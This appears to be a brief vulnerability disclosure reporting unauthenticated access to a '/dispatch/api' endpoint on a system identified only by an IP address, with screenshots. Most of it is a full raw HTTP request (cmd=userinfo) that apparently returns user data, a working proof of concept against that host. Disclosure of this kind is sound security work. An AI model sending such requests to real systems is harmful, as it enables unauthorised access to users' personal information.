VICDP-Unauthorized Access (/dispatch/api) 

Vendor Homepage:
```
https://101.42.223.194:6443/
```

Version: 

```
V1
```

Affected Page:

```
https://101.42.223.194:6443/
```

Function point location：

<img width="2878" height="1488" alt="image" src="https://github.com/user-attachments/assets/cafea264-787a-4828-aafb-9ac9f2070512" />


Request:

```
GET /dispatch/api?cmd=userinfo HTTP/1.1
Host: 101.42.223.194:6443
Sec-Ch-Ua-Platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://101.42.223.194:6443/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=1
Connection: close
```

<img width="2878" height="1614" alt="image" src="https://github.com/user-attachments/assets/d767094c-0986-4303-b930-90ddd775ccb3" />
